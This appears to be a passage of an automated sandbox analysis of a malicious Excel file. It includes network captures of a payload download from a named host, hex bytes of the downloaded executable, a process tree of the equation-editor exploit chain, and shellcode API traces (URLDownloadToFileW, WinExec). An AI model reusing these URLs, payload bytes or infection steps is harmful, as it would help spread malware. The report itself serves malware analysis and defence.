                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 2162
                                                                  Host: www.jilifish.win
                                                                  Origin: http://www.jilifish.win
                                                                  Referer: http://www.jilifish.win/to3j/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 75 43 42 6c 6f 4f 53 41 44 58 75 61 34 66 77 34 59 32 35 68 4d 6f 39 38 6c 43 6b 6c 38 4d 39 41 76 2f 70 48 68 71 46 76 2b 78 2b 51 65 53 79 49 2b 6c 65 2b 4a 47 55 34 65 76 35 57 6f 32 30 62 69 66 61 5a 47 4d 79 66 63 56 53 36 50 6b 68 68 32 52 33 55 57 4b 47 72 53 50 53 70 64 72 65 33 30 6e 6c 72 79 31 58 51 65 69 5a 49 79 38 49 54 53 77 33 42 78 49 49 39 49 39 65 30 46 31 62 55 4a 58 4a 30 76 42 38 73 39 74 4e 72 58 48 38 54 2f 6a 63 70 66 4f 57 70 6d 44 59 30 44 57 75 31 4f 6d 34 42 4e 4a 32 2f 4a 4a 31 69 51 64 4e 6b 55 58 52 41 30 67 33 76 4e 37 66 62 36 51 42 38 49 30 6f 44 41 57 30 37 50 66 4c 50 38 36 35 4e 6d 4b 70 69 63 53 58 73 57 70 4e 74 7a 66 47 7a 37 4f 4d 66 66 48 71 47 51 4d 59 48 6b 63 52 61 49 4e 68 52 54 57 79 41 53 64 4d 41 48 41 76 59 4c 67 71 54 50 2f 62 61 64 69 54 7a 64 64 33 4b 2b 52 67 51 63 77 6b 5a 2b 42 72 57 45 65 53 4b 62 37 76 73 57 50 57 6c 55 41 74 4e 6f 45 72 58 2f 44 37 53 73 4d 35 4d 4c 52 7a 37 42 4e 75 52 37 59 4e 2b 76 74 63 4d 39 79 59 2b [TRUNCATED]
                                                                  Data Ascii: IDX46=uCBloOSADXua4fw4Y25hMo98lCkl8M9Av/pHhqFv+x+QeSyI+le+JGU4ev5Wo20bifaZGMyfcVS6Pkhh2R3UWKGrSPSpdre30nlry1XQeiZIy8ITSw3BxII9I9e0F1bUJXJ0vB8s9tNrXH8T/jcpfOWpmDY0DWu1Om4BNJ2/JJ1iQdNkUXRA0g3vN7fb6QB8I0oDAW07PfLP865NmKpicSXsWpNtzfGz7OMffHqGQMYHkcRaINhRTWyASdMAHAvYLgqTP/badiTzdd3K+RgQcwkZ+BrWEeSKb7vsWPWlUAtNoErX/D7SsM5MLRz7BNuR7YN+vtcM9yY+rLUa49XjhWPQ7QPKmHKjxa1Y/IkicnBgKvQoRu0VKxm3N5jOL8tQDz365b+PmRdjyB1O+55TmO5BLMQYVEXxD0IQRHVtGD8gGz3fVPzbTVsZWzyUIs+8oSPG0wWwnTPPGs0C3kYOjn8ZqSHNWHU4/s/NXUvuIJI5B4xI3QRzkbhTvAqd59EBBnHkPMUPyCmV5nQPXWwNSyQT79QcWp3/KHztwPwTmsZ3jTi2U4ZK0wdiWoa+HlKAitDYzex99yv/L3Zx8O8nQ1V6T8fBoaoINoSHO7B13JrRtx0sfVrryfiJgCmdnhqLLWZ2PbvNPQuK4OC74r1HeRP7suaEnObEeWK3507dDji8izSN1pdsnIQx9c0s+Mxde8ncEdrou+yEZ7VsjxRxeLFgczQgBTvkZh2KUBxnKmYw4aPNu+DRme9dpa3fi96kFrqlMMYP5Ezx9Xhn2hswFBp/e7ogF0bZ1M6avEsPWJo+xi4Ej9Hgl4p3BM77syhgl/4JbyMhh1BiU+GQ6J4ingBQnGIregV2sreb/e7Y9TvsRGkMBY88NvVl8g4CRZe6FvnI5EpRWZ5nkJD4Wk+jFc8hkWI+qp/cKTjZ7nQBYhgU4neuYNf0+2WnAnRwpUqGP6MPs6I/5kB8WrGxr0xTnN9BeXSgSTGsC3+pQmaull6B3G [TRUNCATED]
                                                                  Oct 21, 2024 11:30:30.703071117 CEST161OUTData Raw: 6f 77 37 78 66 34 31 54 48 47 62 6f 6e 6f 44 66 52 57 72 74 38 79 62 6c 36 4d 51 66 73 4a 66 5a 72 79 70 61 2b 36 68 31 63 6d 57 4f 51 57 45 37 73 4e 4c 76 73 4c 41 73 79 4a 38 74 55 7a 38 45 2f 68 73 33 56 6a 59 4e 74 33 69 77 52 65 6e 50 48 59
                                                                  Data Ascii: ow7xf41THGbonoDfRWrt8ybl6MQfsJfZrypa+6h1cmWOQWE7sNLvsLAsyJ8tUz8E/hs3VjYNt3iwRenPHYidQEtD9M1l3zj9qVCmohnqS8a+Lu0NxxxpzUg183uFs7vjSaL3UGZxDIlFRMziZaK4yksrRmeSI6G1f


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.2249162192.3.255.1454433656C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-10-21 09:28:48 UTC317OUTGET /kontempt2.1.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Connection: Keep-Alive
                                                                  Host: timurtrading.my
                                                                  2024-10-21 09:28:48 UTC275INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 21 Oct 2024 09:28:48 GMT
                                                                  Content-Type: application/x-msdos-program
                                                                  Content-Length: 1340509
                                                                  Last-Modified: Sun, 20 Oct 2024 23:50:04 GMT
                                                                  Connection: close
                                                                  ETag: "6715972c-14745d"
                                                                  X-Powered-By: PleskLin
                                                                  Accept-Ranges: bytes
                                                                  2024-10-21 09:28:48 UTC16109INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichi
                                                                  2024-10-21 09:28:48 UTC16384INData Raw: 89 3d c4 32 49 00 89 2d c8 32 49 00 89 2d cc 32 49 00 c7 05 d4 32 49 00 6c 9e 48 00 89 15 e4 32 49 00 89 3d e8 32 49 00 a3 ec 32 49 00 a3 f0 32 49 00 c7 05 f8 32 49 00 64 9e 48 00 89 15 08 33 49 00 89 3d 0c 33 49 00 a3 10 33 49 00 a3 14 33 49 00 c7 05 1c 33 49 00 58 9e 48 00 89 15 2c 33 49 00 89 3d 30 33 49 00 a3 34 33 49 00 a3 38 33 49 00 c7 05 40 33 49 00 48 9e 48 00 89 15 50 33 49 00 89 3d 54 33 49 00 89 15 58 33 49 00 89 15 5c 33 49 00 c7 05 64 33 49 00 38 9e 48 00 89 15 74 33 49 00 89 3d 78 33 49 00 a3 7c 33 49 00 a3 80 33 49 00 c7 05 88 33 49 00 20 9e 48 00 89 35 94 33 49 00 89 15 98 33 49 00 89 3d 9c 33 49 00 89 15 a0 33 49 00 89 2d a4 33 49 00 bb 36 94 47 00 89 1d 48 34 49 00 33 db 89 1d 4c 34 49 00 89 1d 50 34 49 00 bb 78 94 47 00 89 1d 6c 34 49
                                                                  Data Ascii: =2I-2I-2I2IlH2I=2I2I2I2IdH3I=3I3I3I3IXH,3I=03I43I83I@3IHHP3I=T3IX3I\3Id3I8Ht3I=x3I|3I3I3I H53I3I=3I3I-3I6GH4I3L4IP4IxGl4I
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 62 49 00 89 15 9c 62 49 00 c7 05 a4 62 49 00 14 7b 48 00 89 15 b8 62 49 00 a3 bc 62 49 00 a3 c0 62 49 00 c7 05 c8 62 49 00 fc 7a 48 00 89 15 dc 62 49 00 a3 e0 62 49 00 c7 05 e4 62 49 00 02 00 00 00 c7 05 ec 62 49 00 e8 7a 48 00 89 15 00 63 49 00 a3 04 63 49 00 c7 05 08 63 49 00 02 00 00 00 c7 05 10 63 49 00 d4 7a 48 00 89 15 24 63 49 00 a3 28 63 49 00 c7 05 2c 63 49 00 02 00 00 00 c7 05 34 63 49 00 c0 7a 48 00 89 15 48 63 49 00 a3 4c 63 49 00 c7 05 50 63 49 00 02 00 00 00 c7 05 58 63 49 00 ac 7a 48 00 89 15 6c 63 49 00 a3 70 63 49 00 89 35 74 63 49 00 c7 05 7c 63 49 00 8c 7a 48 00 89 3d 88 63 49 00 33 ff 89 3d 8c 63 49 00 bf b8 75 47 00 89 3d ac 63 49 00 33 ff 89 3d b0 63 49 00 bf c8 74 47 00 89 3d d0 63 49 00 33 ff 89 3d d4 63 49 00 bf 59 74 47 00 89 3d
                                                                  Data Ascii: bIbIbI{HbIbIbIbIzHbIbIbIbIzHcIcIcIcIzH$cI(cI,cI4cIzHHcILcIPcIXcIzHlcIpcI5tcI|cIzH=cI3=cIuG=cI3=cItG=cI3=cIYtG=
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 7a ff ff 8d 44 24 10 89 1d a8 83 4a 00 89 3d b0 83 4a 00 89 1d b4 83 4a 00 e8 c5 3d 00 00 8b 15 20 7f 4a 00 8b 5a 04 81 c3 24 7f 4a 00 e8 01 19 00 00 8d 74 24 30 e8 98 c7 ff ff 8d 74 24 10 e8 8f c7 ff ff 33 db 6a f6 88 1d 1c 80 4a 00 89 1d 18 80 4a 00 89 1d 0c 80 4a 00 89 1d 10 80 4a 00 89 1d 08 80 4a 00 89 1d 14 80 4a 00 89 1d 68 80 4a 00 88 1d 84 83 4a 00 88 1d 85 83 4a 00 88 1d a0 83 4a 00 89 1d 74 83 4a 00 ff 15 2c 22 48 00 3b c3 0f 85 e1 01 02 00 89 1d 94 83 4a 00 89 3d 20 80 4a 00 89 3d 24 80 4a 00 89 3d 28 80 4a 00 89 3d f4 81 4a 00 89 3d f8 81 4a 00 b8 0a 00 00 00 5f b9 fa 00 00 00 5e 88 1d 1d 80 4a 00 88 1d 1e 80 4a 00 88 1d 1f 80 4a 00 88 1d 38 80 4a 00 88 1d fc 81 4a 00 88 1d fd 81 4a 00 a3 2c 80 4a 00 a3 30 80 4a 00 c7 05 98 83 4a 00 64 00 00
                                                                  Data Ascii: zD$J=JJ= JZ$Jt$0t$3jJJJJJJhJJJJtJ,"H;J= J=$J=(J=J=J_^JJJ8JJJ,J0JJd
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 0f 87 ef ae 01 00 8b 4e 04 51 c7 46 08 00 00 00 00 e8 ec 07 00 00 83 c4 04 5e c3 8b c1 33 c9 c7 00 30 76 48 00 89 48 04 89 48 08 89 48 0c c3 cc cc cc cc 57 8b f8 83 ef 01 78 15 55 8b 6c 24 0c 56 8b f1 8b ce ff d3 03 f5 83 ef 01 79 f5 5e 5d 5f c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc a1 d0 83 4a 00 85 c0 0f 85 42 8b 01 00 c3 cc cc 33 c0 a3 cc 7c 4a 00 a3 d0 7c 4a 00 a3 d4 7c 4a 00 a3 d8 7c 4a 00 a3 dc 7c 4a 00 a3 e0 7c 4a 00 a2 e4 7c 4a 00 a2 e5 7c 4a 00 b8 cc 7c 4a 00 c3 b8 2c 06 02 00 e8 76 46 01 00 8b 84 24 30 06 02 00 53 33 db 68 00 04 00 00 88 1d 80 8e 4a 00 88 1d 81 8e 4a 00 88 1d 82 8e 4a 00 88 1d 83 8e 4a 00 a3 84 8e 4a 00 89 1d 88 8e 4a 00 89 1d 8c 8e 4a 00 89 1d 90 8e 4a 00 89 1d 94 8e 4a 00 c7 05 98 8e 4a 00 38 52 48 00 89 1d 9c 8e
                                                                  Data Ascii: NQF^30vHHHHWxUl$Vy^]_JB3|J|J|J|J|J|J|J|J|J,vF$0S3hJJJJJJJJJJ8RH
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: c0 0f b7 45 08 74 04 0f b7 45 fc 38 5d f8 74 07 8b 4d f4 83 61 70 fd 5b c9 c3 8b ff 55 8b ec 6a 00 ff 75 08 e8 3c ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 18 53 56 ff 75 0c 8d 4d e8 e8 09 c9 ff ff 8b 5d 08 be 00 01 00 00 3b de 73 54 8b 4d e8 83 b9 ac 00 00 00 01 7e 14 8d 45 e8 50 6a 01 53 e8 0e 5f 00 00 8b 4d e8 83 c4 0c eb 0d 8b 81 c8 00 00 00 0f b7 04 58 83 e0 01 85 c0 74 0f 8b 81 cc 00 00 00 0f b6 04 18 e9 a3 00 00 00 80 7d f4 00 74 07 8b 45 f0 83 60 70 fd 8b c3 e9 9c 00 00 00 8b 45 e8 83 b8 ac 00 00 00 01 7e 31 89 5d 08 c1 7d 08 08 8d 45 e8 50 8b 45 08 25 ff 00 00 00 50 e8 9e e8 ff ff 59 59 85 c0 74 12 8a 45 08 6a 02 88 45 fc 88 5d fd c6 45 fe 00 59 eb 15 e8 52 33 00 00 c7 00 2a 00 00 00 33 c9 88 5d fc c6 45 fd 00 41 8b 45 e8 6a 01 ff 70 04 8d 55 f8
                                                                  Data Ascii: EtE8]tMap[Uju<YY]USVuM];sTM~EPjS_MXt}tE`pE~1]}EPE%PYYtEjE]EYR3*3]EAEjpU
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 8b 4d f4 f3 aa 8b 45 08 eb 2e f7 df 83 c7 10 89 7d f0 33 c0 8b 7d 08 8b 4d f0 f3 aa 8b 45 f0 8b 4d 08 8b 55 10 03 c8 2b d0 52 6a 00 51 e8 7e ff ff ff 83 c4 0c 8b 45 08 8b 7d fc 8b e5 5d c3 cc cc cc cc 56 8b 44 24 14 0b c0 75 28 8b 4c 24 10 8b 44 24 0c 33 d2 f7 f1 8b d8 8b 44 24 08 f7 f1 8b f0 8b c3 f7 64 24 10 8b c8 8b c6 f7 64 24 10 03 d1 eb 47 8b c8 8b 5c 24 10 8b 54 24 0c 8b 44 24 08 d1 e9 d1 db d1 ea d1 d8 0b c9 75 f4 f7 f3 8b f0 f7 64 24 14 8b c8 8b 44 24 10 f7 e6 03 d1 72 0e 3b 54 24 0c 77 08 72 0f 3b 44 24 08 76 09 4e 2b 44 24 10 1b 54 24 14 33 db 2b 44 24 08 1b 54 24 0c f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 5e c2 10 00 8b ff 55 8b ec 83 ec 18 53 57 ff 75 08 8d 4d e8 e8 5e 88 ff ff 8b 45 10 8b 7d 0c 33 db 3b c3 74 02 89 38 3b fb 75 2b
                                                                  Data Ascii: ME.}3}MEMU+RjQ~E}]VD$u(L$D$3D$d$d$G\$T$D$ud$D$r;T$wr;D$vN+D$T$3+D$T$^USWuM^E}3;t8;u+
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 f0 03 00 00 89 b5 c8 fd ff ff e9 e5 03 00 00 a1 40 0d 49 00 89 85 e4 fd ff ff 50 e8 c4 6c ff ff 59 e9 ce 03 00 00 83 f8 70 0f 8f fb 01 00 00 0f 84 e3 01 00 00 83 f8 65 0f 8c bc 03 00 00 83 f8 67 0f 8e 34 fe ff ff 83 f8 69 74 71 83 f8 6e 74 28 83 f8 6f 0f 85 a0 03 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 08 00 00 00 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 04 89 bd dc fd ff ff e8 af 6c 00 00 85 c0 0f 84 2f fa ff ff f6 85 f0 fd ff ff 20 74 0c 66 8b 85 d8 fd ff ff 66 89 06 eb 08 8b 85 d8 fd ff ff 89 06 c7 85 c0 fd ff ff 01 00 00 00 e9 a6 04 00 00 83 8d f0 fd ff ff 40 c7 85 e0 fd ff ff 0a 00 00 00 8b 8d f0 fd ff ff f7 c1 00 80 00 00 0f 84 a9 01 00 00 8b 07 8b 57 04 83 c7 08 e9 d5 01 00 00 75 11 80
                                                                  Data Ascii: +@IPlYpeg4itqnt(otaU7l/ tff@Wu
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 09 00 00 00 8b 45 e4 e8 d8 66 ff ff c3 6a 06 e8 2c 78 ff ff 59 c3 8b ff 55 8b ec 83 ec 10 56 8b 75 08 57 33 ff 89 7d fc 3b f7 75 1e e8 05 74 ff ff 6a 16 5e 57 57 57 57 57 89 30 e8 8e 73 ff ff 83 c4 14 8b c6 e9 0b 02 00 00 6a 24 68 ff 00 00 00 56 e8 ac 26 ff ff 8b 45 0c 83 c4 0c 3b c7 74 cb 8b 08 8b 40 04 83 f8 ff 89 4d f0 89 45 f4 7f 16 7c 08 81 f9 40 57 ff ff 73 0c e8 b6 73 ff ff 6a 16 5e 89 30 eb bc 83 f8 07 7c 0a 7f ed 81 f9 cf 26 41 93 77 e5 53 57 68 80 33 e1 01 50 51 e8 7f 02 00 00 8b c8 83 c1 46 8d 81 2b 01 00 00 99 bb 90 01 00 00 f7 fb 8d 79 ff 6a 64 89 7d f8 89 4d 08 8b d8 8b c7 99 5f f7 ff 6a ff 68 93 fe ff ff 2b d8 8b 45 f8 99 83 e2 03 03 c2 c1 f8 02 8d 44 03 ef 99 8b f8 8d 41 ba 8b da 99 52 50 e8 10 28 00 00 2b c7 1b d3 6a 00 bb 80 51 01 00 53
                                                                  Data Ascii: Efj,xYUVuW3};utj^WWWWW0sj$hV&E;t@ME|@Wssj^0|&AwSWh3PQF+yjd}M_jh+EDARP(+jQS
                                                                  2024-10-21 09:28:49 UTC16384INData Raw: 2d 46 f7 d8 13 d3 f7 da 3b d3 8b fe c6 06 30 7c 24 b9 e8 03 00 00 7f 04 3b c1 72 19 53 51 52 50 e8 9e 1e 00 00 04 30 88 06 46 89 55 f0 8b c1 8b d3 3b f7 75 0b 85 d2 7c 1e 7f 05 83 f8 64 72 17 6a 00 6a 64 52 50 e8 78 1e 00 00 04 30 88 06 89 55 f0 46 8b c1 8b d3 3b f7 75 0b 85 d2 7c 1f 7f 05 83 f8 0a 72 18 6a 00 6a 0a 52 50 e8 52 1e 00 00 04 30 88 06 89 55 f0 46 8b c1 89 5d f0 04 30 88 06 c6 46 01 00 80 7d e8 00 74 07 8b 45 e4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 83 ec 10 53 56 57 ff 75 14 8b d8 8b 73 04 8b f9 8d 4d f0 4e e8 93 c8 fe ff 85 ff 75 2d e8 75 33 ff ff 6a 16 5e 89 30 33 c0 50 50 50 50 50 e8 fc 32 ff ff 83 c4 14 80 7d fc 00 74 07 8b 45 f8 83 60 70 fd 8b c6 e9 a3 00 00 00 83 7d 08 00 76 cd 80 7d 10 00 74 18 3b 75 0c 75 13 33 c0 83 3b 2d
                                                                  Data Ascii: -F;0|$;rSQRP0FU;u|drjjdRPx0UF;u|rjjRPR0UF]0F}tE`p3[_^USVWusMNu-u3j^03PPPPP2}tE`p}v}t;uu3;-


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:1
                                                                  Start time:05:28:16
                                                                  Start date:21/10/2024
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                  Imagebase:0x13fb40000
                                                                  File size:28'253'536 bytes
                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:05:28:45
                                                                  Start date:21/10/2024
                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                  Imagebase:0x400000
                                                                  File size:543'304 bytes
                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:05:28:52
                                                                  Start date:21/10/2024
                                                                  Path:C:\Users\user\AppData\Roaming\word.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                  Imagebase:0x400000
                                                                  File size:1'340'509 bytes
                                                                  MD5 hash:2F7343C9A832A66E138737450432D3AC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 32%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:05:28:54
                                                                  Start date:21/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                  Imagebase:0x7c0000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:05:29:20
                                                                  Start date:21/10/2024
                                                                  Path:C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe"
                                                                  Imagebase:0x8c0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:05:29:21
                                                                  Start date:21/10/2024
                                                                  Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                  Imagebase:0x5a0000
                                                                  File size:303'104 bytes
                                                                  MD5 hash:5F2122888583347C9B81724CF169EFC6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:05:29:34
                                                                  Start date:21/10/2024
                                                                  Path:C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe"
                                                                  Imagebase:0x8c0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:12
                                                                  Start time:05:29:50
                                                                  Start date:21/10/2024
                                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x1290000
                                                                  File size:517'064 bytes
                                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:54.3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:87.5%
                                                                    Total number of Nodes:32
                                                                    Total number of Limit Nodes:3
                                                                    execution_graph 133 36ae55a LoadLibraryW 145 36ae582 133->145 135 36ae56f 136 36ae5e4 135->136 156 36ae5e1 URLDownloadToFileW 135->156 162 36ae5fe 136->162 142 36ae593 URLDownloadToFileW 142->136 146 36ae585 145->146 147 36ae5e1 6 API calls 146->147 148 36ae593 URLDownloadToFileW 146->148 147->148 150 36ae5e4 148->150 151 36ae5fe 5 API calls 150->151 152 36ae5e6 151->152 153 36ae661 152->153 166 36ae62c 152->166 153->135 155 36ae624 157 36ae5ea 156->157 158 36ae5fe 5 API calls 156->158 159 36ae661 157->159 160 36ae62c 5 API calls 157->160 158->157 159->142 161 36ae624 160->161 163 36ae601 162->163 164 36ae62c 5 API calls 163->164 165 36ae624 164->165 167 36ae62f WinExec 166->167 173 36ae64c 167->173 169 36ae640 170 36ae687 169->170 171 36ae64f ExitProcess GetPEB 169->171 170->155 172 36ae661 171->172 172->155 174 36ae64f ExitProcess GetPEB 173->174 175 36ae661 174->175 175->169

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
                                                                    callgraph 0 Function_036AE55A 1 Function_036AE67B 0->1 2 Function_036AE5FE 0->2 4 Function_036AE62C 0->4 6 Function_036AE582 0->6 7 Function_036AE5E1 0->7 2->4 3 Function_036AE64C 3->1 4->1 4->3 5 Function_036AE6CC 6->1 6->2 6->4 6->7 7->1 7->2 7->4

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32 ref: 036AE568
                                                                      • Part of subcall function 036AE582: URLDownloadToFileW.URLMON(00000000,036AE593,?,00000000,00000000), ref: 036AE5E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.461593136.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                    Similarity
                                                                    • API ID: DownloadFileLibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 2776762486-0
                                                                    • Opcode ID: 1b4a8ccb116f0d13838788f8e78e8ed89f32e3abeaf94c524b36f8648eadce45
                                                                    • Instruction ID: 77fd588e7244208078f0841992a9cd2169485bf40f282445308cd2ba4c500c1b
                                                                    • Opcode Fuzzy Hash: 1b4a8ccb116f0d13838788f8e78e8ed89f32e3abeaf94c524b36f8648eadce45
                                                                    • Instruction Fuzzy Hash: A721A06544DBC12FC712D3381D7AB65BF656B93200F1CCACEE0D10B1E3A356AA05CA56

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 29 36ae62c-36ae643 WinExec call 36ae64c 34 36ae695 29->34 35 36ae645 29->35 38 36ae69d-36ae6a1 34->38 39 36ae697-36ae69b 34->39 36 36ae6b6-36ae6b8 35->36 37 36ae647-36ae65e ExitProcess GetPEB 35->37 40 36ae6c8-36ae6c9 36->40 49 36ae661-36ae672 call 36ae67b 37->49 38->36 43 36ae6a3-36ae6a7 38->43 39->38 42 36ae6a9-36ae6b0 39->42 44 36ae6b2 42->44 45 36ae6b4 42->45 43->36 43->42 44->36 46 36ae6ba-36ae6c3 45->46 50 36ae68c-36ae68f 46->50 51 36ae6c5 46->51 56 36ae674-36ae678 49->56 50->46 54 36ae691 50->54 51->40 54->34
                                                                    APIs
                                                                    • WinExec.KERNEL32(?,00000001,?,036AE624,?,036AE5EA), ref: 036AE639
                                                                      • Part of subcall function 036AE64C: ExitProcess.KERNEL32(00000000,?,036AE640,?,036AE624,?,036AE5EA), ref: 036AE651
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.461593136.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                    Similarity
                                                                    • API ID: ExecExitProcess
                                                                    • String ID:
                                                                    • API String ID: 4112423671-0
                                                                    • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                                    • Instruction ID: c3c8b7742d670f3da0a9ec9b39d414fae705593dd2218012ede270768c6ca527
